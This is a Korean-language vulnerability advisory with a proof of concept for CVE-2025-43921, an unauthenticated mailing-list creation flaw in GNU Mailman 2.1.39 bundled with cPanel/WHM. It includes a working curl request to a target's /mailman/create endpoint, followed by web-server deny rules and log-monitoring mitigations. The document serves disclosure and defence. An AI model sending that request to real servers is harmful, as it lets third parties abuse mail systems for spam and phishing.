
CVE-2025-43921에 대한 개념 증명 익스플로잇 및 기술 분석: GNU Mailman 2.1.39의 인증 우회 취약점으로, /mailman/create 엔드포인트를 통해 인증되지 않은 메일링 리스트 생성을 허용합니다.
발견자: Firudin Davudzada & Musazada Aydan
공개일: 2025년 4월
CVE ID: CVE-2025-43921
심각도: 5.3 Medium (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)
공격 유형: 원격
영향받는 소프트웨어: GNU Mailman 2.1.39 (cPanel/WHM 번들)
cPanel 및 WHM에 번들로 포함된 GNU Mailman 2.1.39는 인증 우회 결함에 취약하여 인증되지 않은 공격자가 /mailman/create 엔드포인트를 통해 메일링 리스트를 생성할 수 있습니다. 이 문제는 create CGI 스크립트의 접근 제어 누락으로 인해 발생하며, 공격자가 스팸, 피싱 또는 리소스 고갈을 위해 메일링 시스템을 악용할 수 있게 합니다.
이 취약점은 Postorius의 부적절한 리스트 관리 권한과 같은 Mailman의 과거 접근 제어 문제와 일치합니다. CVE-2025-43920과 연계하여 영향을 확대하고 더 광범위한 공격을 위한 플랫폼을 만들 수 있습니다.
create CGI 스크립트 (리스트 생성 요청 처리)Mailman/Handlers/ (리스트 관리 로직)/mailman/create에 대한 POST 요청에 인증 검사가 없어 임의 리스트 생성 가능다음 명령어는 hacked라는 이름의 메일링 리스트를 생성합니다:
curl http://target/mailman/create -d "listname=hacked&[email protected]&password=1234&confirm=1234"
예상 결과: 새로운 메일링 리스트가 생성되며, 공격자가 지정한 소유자 이메일로 제어 가능합니다.
/mailman/create로 보내 조작된 매개변수로 메일링 리스트 생성엔드포인트 접근 차단: 웹 서버를 구성하여 /mailman/create에 대한 접근을 제한:
location /mailman/create {
deny all;
return 403;
}
또는 Apache의 경우:
<Location "/mailman/create">
Deny from all
</Location>
로그 모니터링: 무단 리스트 생성 시도 확인:
tail -f /var/log/mailman/* | grep "newlist"
/mailman/create에 속도 제한을 적용하여 남용 방지Firudin Davudzada와 Musazada Aydan은 승인된 침투 테스트 기간 동안 이 취약점을 책임감 있게 공개했습니다. 조정을 위해 MITRE CVE 팀에 감사드립니다.
이메일: [email protected]\